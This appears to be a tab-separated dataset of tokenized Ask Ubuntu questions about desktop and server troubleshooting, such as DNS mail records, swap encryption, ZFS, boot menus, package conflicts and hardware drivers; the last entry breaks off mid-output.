322522	dns problem : how can i receive mail through google mail ?	recently i wanted to host my own domain on my ubuntu server . i have configured bind with the following configuration file : $ origin tesa.com.ro . $ ttl 1800 @ in soa ns1.tesa.com.ro . ticket.tesa.com.ro . ( 2009071804 1800 1h 1w 1h ) ; vanity dns @ 86400 in ns ns1.tesa.com.ro . @ 86400 in ns ns2.tesa.com.ro . ; vanity dns must point to ip of ns1.nixcraft.net and ns2.nixcraft.net ns1 86400 in a 89.238.232.245 ns2 86400 in a 89.238.232.245 ; host stuff @ 86400 in a 89.238.232.245 www 86400 in a 89.238.232.245 ftp 86400 in a 89.238.232.245 mail 86400 in cname ghs.google.com . in mx 5 alt1.aspmx.l.google.com . in mx 5 alt2.aspmx.l.google.com . in mx 1 aspmx.l.google.com . in mx 10 aspmx2.googlemail.com . in mx 10 aspmx3.googlemail.com . in mx 10 aspmx4.googlemail.com . in mx 10 aspmx5.googlemail.com . however the mail wo n't work , it works when i want to send email but i am not able to receive email here is the diagnostics from google : https : //toolbox.googleapps.com/apps/checkmx/check ? from=support.google.com & origin=checkmx-widget & domain=tesa.com.ro can somebody please tell me what i am doing wrong ? thank you
322526	how to remove frozen entry in nautilus file/copy transfer dialog ?	sometimes it happens that an item freezes/hangs in the nautilus file/copy transfer dialog . it is not possible to abort the progress ( you can click the icon , the button gets disabled , but nothing happens ) . if you close the dialog and re-open it , there is still the broken file transfer item in it . how to solve this issue or can someone provide a workaround ? i 'm using ubuntu 13.04 64bit .
322528	error while encrypting swap on ubuntu 12.04	i successfully encrypted my swap using ecryptfs-setup-swap command on my test ubuntu 12.04 server that runs on a virtual machine , so i written down all the steps i made on my blog , see http : //developernote.com/2013/07/how-to-encrypt-swap-on-ubuntu-12-04/ , i even included the source code of ecryptfs-setup-swap script to the post . when i tried to run ecryptfs-setup-swap command on my production ubuntu 12.04 server something went wrong . it shown me the following message : warning : an encrypted swap is required to help ensure that encrypted files are not leaked to disk in an unencrypted format . however , the swap encryption configuration produced by this program will break hibernate/resume on this system ! note : your suspend/resume capabilities will not be affected . do you want to proceed with encrypting your swap ? [ y/n ] : y info : setting up swap : [ /dev/dm-1 ] * stopping remaining crypto disks ... * cryptswap1 ( stopped ) ... [ ok ] * starting remaining crypto disks ... * cryptswap1 ( starting ) .. * cryptswap1 ( started ) ... [ ok ] swapon : /dev/mapper/gate-swap_1 : swapon failed : invalid argument my /etc/fstab file contains the following ( looks like there are two swaps ) : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # proc /proc proc nodev , noexec , nosuid 0 0 /dev/mapper/gate-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=6ff98683-5ec4-4fb9-a6aa-fe5c218b94c9 /boot ext2 defaults 0 2 /dev/mapper/gate-swap_1 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 /etc/crypttab : # cryptswap1 /dev/dm-1 /dev/urandom swap , cipher=aes-cbc-essiv : sha256 fdisk -l shows the following : disk /dev/sda : 40.0 gb , 40020664320 bytes 255 heads , 63 sectors/track , 4865 cylinders , total 78165360 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000ccc39 device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 78163967 38831105 5 extended /dev/sda5 501760 78163967 38831104 8e linux lvm disk /dev/mapper/gate-root : 37.6 gb , 37648072704 bytes 255 heads , 63 sectors/track , 4577 cylinders , total 73531392 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/gate-root does n't contain a valid partition table disk /dev/mapper/gate-swap_1 : 2113 mb , 2113929216 bytes 255 heads , 63 sectors/track , 257 cylinders , total 4128768 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/gate-swap_1 does n't contain a valid partition table disk /dev/mapper/cryptswap1 : 2113 mb , 2113929216 bytes 255 heads , 63 sectors/track , 257 cylinders , total 4128768 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6e749d91 disk /dev/mapper/cryptswap1 does n't contain a valid partition table free -m : total used free shared buffers cached mem : 1981 1840 141 0 337 985 -/+ buffers/cache : 517 1463 swap : 2015 0 2015 it is not clear to me what actually happened with my old unencrypted swap ? does it work now ? what will happened with it if i reboot the server ? and finally , how to disable my old swap and get encrypted swap work ?
322536	tcp/ip server client	i just started using linux . i have dual boot setup and i am familiar with socket programming but on windows in visual studio c # . now i am trying to build a simple application that will run on ubuntu . i have some questions like were to start ? if one for instance server is running on windows can client be on ubuntu ? can i just write the code in eclipse compile and run it or i need first to preform some configuration in terminal window for linux ? i want to understand and learn how to send data wireless form one pc to another without using router in a middle if it 's possible ? and with router in a middle then it suppose to be simpler i think .
322538	how can i have both alt + shift to change the keyboard layout , and alt + shift + tab to do reverse window switch ?	on a previous version of ubuntu/gnome , i used to have alt+shift toggle the keyboard layout and alt+shift+tab do the same as alt-tab but in the opposite direction . right now , i ca n't do this : if alt+shift is enabled to change the keyboard layout , alt+shift+tab will not work ( it 'll act as if i had just pressed alt+tab ) . i 'm almost sure that before , the keyboard layout would not change until i let go of alt ( so , alt+shift keydown would do nothing , alt+shift and then keyup of shift would change the language ) . how can i fix this ?
322541	activate zfs snapshots	i accidentally delete some files from my zfs pool and tried to mount the latest snapshots but i just figured out that i have no snapshots . how to activate the snapshots , how to configure it ? i am using ubuntu 12.04.1 server and zfs 0.6.1 , pool version is 28 .
322542	zfs raid1-z replace disk	i inted one of my disk from the lower raid1z setup and i was wondering what is the best way to do it , what a re the steps . name state read write cksum misu online 0 0 0 raidz1-0 online 0 0 0 scsi-sata_st3000dm001-9yn_z1f1587b online 0 0 0 scsi-sata_st3000dm001-9yn_z1f14j7v online 0 0 0 scsi-sata_st3000dm001-9yn_z1f14jyl online 0 0 0 scsi-sata_st3000dm001-1ch_w1f1g04f online 0 0 0 scsi-sata_st3000dm001-1ch_w1f1g1h7 online 0 0 0 will the lower command do the trick ? do i have to do something more ? zpool offline misu scsi-sata_st3000dm001-1ch_w1f1g04f shutdown and replace drive ( i 'm replacing the disk in the same slot so basicly the sd* shall be the same , even if is not the same i will change it accordingly ) zpool replace misu scsi-sata_st3000dm001-1ch_w1f1g04f
322543	how can i make changes to the boot options ?	i recently installed ubuntu 12.04 lts . now when i start the computer i am presented with the new boot options where i can choose whether i want to boot into windows or ubuntu . i would like to keep this menu but how can i move windows vista to the top of the list ?
322552	xbmc starting after login insted of gnome	i have a problem . in my ubuntu 13.04 i have 3 users , one of them suddenly get xbmc starter right after login . how i can change this and restore oryginal settings ( gnome , unity ) desktop for this user . admin account is working properly .
322556	is it possible to use logitech c310 webcam full-featured ?	through the software cheese or other softwares in the software center , i ca n't take photos with the resolution 5 mega-pixels , ca n't use motion-detect , pan , tilt and zoom.is it possible to use these c310 's features under ubuntu ? i think , the reason why i ca n't use is related to the driver linux uses , not to the softwares.therefore , is there any other driver for linux to use the c310 's features especially taking 5mp photos ?
322563	how to restore a replaced file in /bin ?	i have created a c program which will sort the array of int given at runtime named 'com ' . and mistakenly typed following command : sudo mv com /bin/cp so now cp work as com and there is no cp , please help .
322565	completely messed up booting . ca n't even boot from dvd	i 'm so sad i did such things , but about two weeks ago a got a new lenovo u510 laptop . of course that 's not the problem : d. i wanted to dual-boot ubuntu alongside windows 8 . everything was quite smooth , but later i wanted to change boot manager with easybcd . it did n't do what i expected , so i returned to default in easybcd . now when i want to boot to windows it says : windows failed to start . ... status : '' 0xc0000098 info : the boot configuration data file does n't contain valid information for an operation system . i found many answers what to do , how to fix it with recovery dvd . but when i wanted to set boot to dvd , i opened bios boot options and under efi there were two times `` ubuntu '' and two times `` windows boot manager '' . but cd/dvd disappeared ? that 's the main problem i think . i think it has something to do with partitioning . notice : i still have access to ubuntu . so maybe i can fix this from ubuntu ? how can i return that cd/dvd option to bios efi ?
322569	jumpy mouse pointer	i 'm using precise pangolin ( with the latest updates ) in my thinkpad x220 but apparently when i have my laptop plugged in and the battery is fully charged the mouse pointer jumps like crazy when i try to use the touchpad . i believe they fixed this problem via drivers to windows users .
322576	lspci not detecting my graphic card	i recently purchased a lenovo g505s , the specifications of which can be found here . after setting up ubuntu 13.04 i tried to install the ati proprietary drivers . but only my integrated graphics are being detected . plus thereâs an amd unsupported hardware water mark at the bottom right of my screen ( not an issue as long as the system works ) . even lspci -v command does not detect my dedicated graphic card . i tried to check my bios but i ca n't find any option to switch between integrated and dedicated graphics . currently the graphics option under bios is set to switch-able graphics . please help me enable my dedicated graphic card . here is the output of lspci -v : - dexter @ dexter-lenovo-g505s : ~ $ lspci -v 00:00.0 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor root complex subsystem : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor root complex flags : bus master , 66mhz , medium devsel , latency 32 00:01.0 vga compatible controller : advanced micro devices [ amd ] nee ati richland [ radeon hd 8650g ] ( prog-if 00 [ vga controller ] ) subsystem : lenovo device 3804 flags : bus master , fast devsel , latency 0 , irq 52 memory at e0000000 ( 32-bit , prefetchable ) [ size=256m ] i/o ports at 3000 [ size=256 ] memory at f0200000 ( 32-bit , non-prefetchable ) [ size=256k ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : fglrx_pci 00:01.1 audio device : advanced micro devices [ amd ] nee ati trinity hdmi audio controller subsystem : lenovo device 397c flags : bus master , fast devsel , latency 0 , irq 46 memory at f0244000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:04.0 pci bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor root port ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 00002000-00002fff memory behind bridge : f0100000-f01fffff capabilities : < access denied > kernel driver in use : pcieport 00:05.0 pci bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor root port ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 memory behind bridge : f0000000-f00fffff prefetchable memory behind bridge : 00000000f0300000-00000000f03fffff capabilities : < access denied > kernel driver in use : pcieport 00:10.0 usb controller : advanced micro devices [ amd ] fch usb xhci controller ( rev 09 ) ( prog-if 30 [ xhci ] ) subsystem : lenovo device 397c flags : bus master , fast devsel , latency 0 , irq 18 memory at f0248000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel driver in use : xhci_hcd 00:11.0 sata controller : advanced micro devices [ amd ] fch sata controller [ ahci mode ] ( prog-if 01 [ ahci 1.0 ] ) subsystem : lenovo device 397c flags : bus master , 66mhz , medium devsel , latency 64 , irq 45 i/o ports at 3118 [ size=8 ] i/o ports at 3124 [ size=4 ] i/o ports at 3110 [ size=8 ] i/o ports at 3120 [ size=4 ] i/o ports at 3100 [ size=16 ] memory at f024e000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:12.0 usb controller : advanced micro devices [ amd ] fch usb ohci controller ( rev 11 ) ( prog-if 10 [ ohci ] ) subsystem : lenovo device 397c flags : bus master , 66mhz , medium devsel , latency 32 , irq 18 memory at f024d000 ( 32-bit , non-prefetchable ) [ size=4k ] kernel driver in use : ohci_hcd 00:12.2 usb controller : advanced micro devices [ amd ] fch usb ehci controller ( rev 11 ) ( prog-if 20 [ ehci ] ) subsystem : lenovo device 397c flags : bus master , 66mhz , medium devsel , latency 32 , irq 17 memory at f024c000 ( 32-bit , non-prefetchable ) [ size=256 ] capabilities : < access denied > kernel driver in use : ehci-pci 00:13.0 usb controller : advanced micro devices [ amd ] fch usb ohci controller ( rev 11 ) ( prog-if 10 [ ohci ] ) subsystem : lenovo device 397c flags : bus master , 66mhz , medium devsel , latency 32 , irq 18 memory at f024b000 ( 32-bit , non-prefetchable ) [ size=4k ] kernel driver in use : ohci_hcd 00:13.2 usb controller : advanced micro devices [ amd ] fch usb ehci controller ( rev 11 ) ( prog-if 20 [ ehci ] ) subsystem : lenovo device 397c flags : bus master , 66mhz , medium devsel , latency 32 , irq 17 memory at f024a000 ( 32-bit , non-prefetchable ) [ size=256 ] capabilities : < access denied > kernel driver in use : ehci-pci 00:14.0 smbus : advanced micro devices [ amd ] fch smbus controller ( rev 16 ) subsystem : lenovo device 397c flags : 66mhz , medium devsel 00:14.2 audio device : advanced micro devices [ amd ] fch azalia controller ( rev 01 ) subsystem : lenovo device 397c flags : bus master , slow devsel , latency 32 , irq 16 memory at f0240000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:14.3 isa bridge : advanced micro devices [ amd ] fch lpc bridge ( rev 11 ) subsystem : lenovo device 397c flags : bus master , 66mhz , medium devsel , latency 0 00:14.4 pci bridge : advanced micro devices [ amd ] fch pci bridge ( rev 40 ) ( prog-if 01 [ subtractive decode ] ) flags : bus master , 66mhz , medium devsel , latency 64 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=64 00:18.0 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 0 flags : fast devsel 00:18.1 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 1 flags : fast devsel 00:18.2 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 2 flags : fast devsel 00:18.3 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 3 flags : fast devsel capabilities : < access denied > kernel driver in use : k10temp 00:18.4 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 4 flags : fast devsel 00:18.5 host bridge : advanced micro devices [ amd ] family 15h ( models 10h-1fh ) processor function 5 flags : fast devsel 01:00.0 ethernet controller : qualcomm atheros qca8172 fast ethernet ( rev 10 ) subsystem : lenovo device 3806 flags : bus master , fast devsel , latency 0 , irq 16 memory at f0100000 ( 64-bit , non-prefetchable ) [ size=256k ] i/o ports at 2000 [ size=128 ] capabilities : < access denied > kernel driver in use : alx 02:00.0 network controller : atheros communications inc. ar9485 wireless network adapter ( rev 01 ) subsystem : lenovo device 3218 flags : bus master , fast devsel , latency 0 , irq 17 memory at f0000000 ( 64-bit , non-prefetchable ) [ size=512k ] expansion rom at f0300000 [ disabled ] [ size=64k ] capabilities : < access denied > kernel driver in use : ath9k
322579	12.04 giving problems with iogear gpsu21 print server	all . i had an old winxp box i was using as file server and print server and it has failed . i 'm trying to set up an iogear gpsu21 print server with the same printer . my 12.04 laptop printed to this printer without issue when it was on the xp box . when printing through the gpsu21 , i get the following status , and the printing fails : `` processing - error writing spool : nt_status_io_timeout '' this laptop dual-boots to win7 , and i can print to the printer through the gpsu21 fine there . i followed the suggestions here : http : //ubuntuforums.org/announce.html ? t=1658955 but they did n't help . ( those suggestions are to add `` allow all '' directives in several of the location tags in the /etc/cups/cupsd.conf file . ) any suggestions on where to go from here ? thanks !
322585	nautilus script for eset scanner	i have installed eset antivirus as per the instructions given here all is working well but instead of gui i want to have a responsive terminal option available too thus i created a symlink via : sudo ln -s /opt/eset/esets/sbin/esets_scan /bin/eset now i can siimply run eset < destination > along with further flags to get the job done . provided the eset by default scan all subdirectories in said destination i want to hava a nautilus script that sits in my context & whenever i want i right-click a folder ( & using this script ) be able to scan that folder . of coarse i want the terminal to remain open so that i can see the progress & logs , in my attempts the scan initiates but as soon as it is done terminal quits : (
322588	ubuntu 13.04 only sometimes starts : `` no system-disk or disk error ''	i just installed ubuntu 13.04 on my hp 2530p laptop with no other os installed . all worked well but when restarting , after the bios screen , there was just a blank black screen reading `` no system-disk or disk error '' . restarting multiple times , ubuntu started normally . but upon the next restart , the same happened : `` no system-disk or disk error '' and i needed to repeat this procedure . according to the `` disk '' -utility , my disk ( toshiba , 120 gb ) is 47 celcius degrees warm and has no disk errors . is this a ubuntu-problem or a grub-problem ( no grub menue pops up because there is no choice at the start ) ?
322591	elementary-theme package broken , how do i fix it ?	i was trying to install elementary theme over unity in ubuntu 12.04 , parallel to my win7 . both are running fine till this mishap by me today . the apt-get could n't install the dependencies hence crashed . now i tried to rectify with sudo apt-get -f install at one stage when i got this output : [ 835:15 ] sources.list.d bash $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : elementary-theme the following new packages will be installed : elementary-theme 0 upgraded , 1 newly installed , 0 to remove and 45 not upgraded . 3 not fully installed or removed . need to get 0 b/133 kb of archives . after this operation , 1,497 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 257956 files and directories currently installed . ) unpacking elementary-theme ( from ... /elementary-theme_3.4- > 0~r649+pkg293~precise1_all.deb ) ... dpkg : error processing /var/cache/apt/archives/elementary-theme_3.4- > 0~r649+pkg293~precise1_all.deb ( -- unpack ) : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/range/slider.png ' , which is also in package elementary 3.1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/elementary-theme_3.4-0~r649+pkg293~precise1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) now how can i sort this out as this is not giving me any chance to update the local installations ? update : @ jorge , my findings to your patch is as follows : [ 849:6 ] ~ bash $ sudo dpkg -i -- force-overwrite /var/cache/apt/archives/elementary-theme_3.4-0~r649+pkg293~precise1_all.deb ( reading database ... 257950 files and directories currently installed . ) unpacking elementary-theme ( from ... /elementary-theme_3.4-0~r649+pkg293~precise1_all.deb ) ... dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/range/slider.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/range/trough.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/range/slider-prelight.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/handle/dimple.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/handle/pane-horiz.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/handle/resize_grip.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/handle/pane-vert.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/sidebar/handle.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/nautilus/right_slider_normal.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/nautilus/breadcrumb_prelight.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/nautilus/left_slider_normal.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/nautilus/button/right_slider_normal_alt.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/nautilus/button/left_slider_normal_alt.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/nautilus/button/breadcrumb_prelight.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/nautilus/button/breadcrumb_normal.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/nautilus/old/right_slider_normal.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/nautilus/old/breadcrumb_prelight.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/nautilus/old/left_slider_normal.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/nautilus/old/breadcrumb_normal.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/nautilus/breadcrumb_normal.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/nautilus/extra-widget.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/button/normal.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/button/insensitive.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/button/mode_prelight.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/button/selected.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/button/prelight.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/button/mode_normal.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/button/mode_pressed.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/gtkrc ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/apps/steadyflow.rc ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/apps/xfce-panel.rc ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/apps/xfce-panel/panel-dark.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/icons/media-skip-forward.svg ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/icons/media-playback-pause.svg ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/icons/media-skip-backward.svg ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/icons/media-playback-start.svg ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-2.0/icons/close.png ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/metacity-1/metacity-theme-3.xml ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/index.theme ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-3.0/assets/resize-grip.svg ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-3.0/assets/scale-slider.svg ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-3.0/assets/switch-slider.svg ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-3.0/assets/pane-handle.svg ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-3.0/assets/scale-slider-insensitive.svg ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-3.0/content-view.css ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-3.0/gtk-widgets.css ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-3.0/scrollbar.css ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-3.0/menu.css ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-3.0/settings.ini ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-3.0/gtk.css ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-3.0/progressbar.css ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-3.0/toolbar.css ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-3.0/scale.css ' , which is also in package elementary 3.1 dpkg : warning : overriding problem because -- force enabled : trying to overwrite '/usr/share/themes/elementary/gtk-3.0/button.css ' , which is also in package elementary 3.1 setting up elementary-theme ( 3.4-0~r649+pkg293~precise1 ) ... what am i doing wrong actually here ?
322595	`` -6 : not supported '' error when transferring files from phone to external hdd	i am trying to transfer files from my phone to my external hdd . both are plugged into the computer running ubuntu 12.04 . i am getting a message saying `` error while copying `` ubuntu made easy , 5th edition.pdf '' . there was an error copying the file into /media/untitled/documents/computer science/c/c in a nutshell ( 2006 ) . error getting file : -6 : not supported '' . i have tried drag and drop , cutting the file and pasting into the folder and the option to copy to desktop . i get the same message when trying to transfer from phone to desktop . how do i fix this ?
322598	how do i get wifi working on my dell inspiron 1501 ?	i know there are other answers similar to this , i have tried those but am stuck . in windows my wifi led was on , in ubuntu it is not . function keys are not turning it on . there is no reference to wifi from network manager , only : ethernet network disconnected ( greyed out ) vpn connections enable networking ( ticked ) connection information ( greyed out ) edit connections i have tried using rfkill from terminal , but nothing happens , it just goes back to command line . i have also tried sudo rfkill , with the same result . should wifi work when running from the live cd ? would like it to so i can see full extent of system . i 'd appreciate any help , but please remember i 'm new . sorry if this is too similar to other questions . result of lspci -nnk | grep -i net is 05:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 ) 08:00.0 ethernet controller [ 0200 ] : broadcom corporation bcm 4401-b0 100 base-tx [ 14e4:170c ] ( rev 02 ) the `` net '' is red is both lines . ubuntu version is 13.04 ( boot from live system ) and i am on a dell inspiron 1501 .
322600	`` do you want to continue [ y/n ] ? '' why the upper case ?	i am new to ubuntu and some little thing start to bug me . such as when trying to install a program , ubuntu asks , do you want to continue [ y/n ] ? what is bugging me is why the letter `` y '' is upper case and `` n '' is lower case . do they have any significant reason why one is upper and the latter is lower ? whatever case i enter it does n't change the outcome : it either continues or not . are they trying to notify us that we can enter both and it wo n't change anything ?
322604	double bluetooth icons	my taskbar shows double bluetooth icons when my bluetooth is activated : when i click the rightmost i get to see this menu : and this is the menu of the icon to the left : the 'about ' window : how do i merge the icons , or remove them ?
322605	power indicator gone missing ubuntu 13.04	i am using ubuntu 13.04 32-bit for quite some time on acer aspire one aod255 netbook and today i found out that power indicator icon is missing from unity panel . also , i didnot get any low power notification and my laptop just turned off instead of hibernating . the indicator is being displayed on login screen . upower output : ali @ ali-aod255 : ~ $ upower -d device : /org/freedesktop/upower/devices/line_power_ac native-path : /sys/devices/lnxsystm:00/lnxsybus:00/pnp0a08:00/device:01/acpi0003:00/power_supply/ac power supply : yes updated : sun jul 21 20:26:31 2013 ( 773 seconds ago ) has history : no has statistics : no line-power online : no device : /org/freedesktop/upower/devices/battery_bat0 native-path : /sys/devices/lnxsystm:00/lnxsybus:00/pnp0a08:00/device:01/pnp0c0a:00/power_supply/bat0 vendor : sanyo model : al10a31 power supply : yes updated : sun jul 21 20:39:02 2013 ( 22 seconds ago ) has history : yes has statistics : yes battery present : yes rechargeable : yes state : discharging energy : 2.9082 wh energy-empty : 0 wh energy-full : 18.1263 wh energy-full-design : 24.42 wh energy-rate : 9.8568 w voltage : 10.802 v time to empty : 17.7 minutes percentage : 16.0441 % capacity : 74.2273 % technology : lithium-ion history ( charge ) : 1374421111 16.044 discharging history ( rate ) : 1374421142 9.857 discharging 1374421111 9.446 discharging 1374421080 9.291 discharging daemon : daemon-version : 0.9.20 can-suspend : yes can-hibernate : yes on-battery : yes on-low-battery : no lid-is-closed : no lid-is-present : yes is-docked : no dmesg output : ali @ 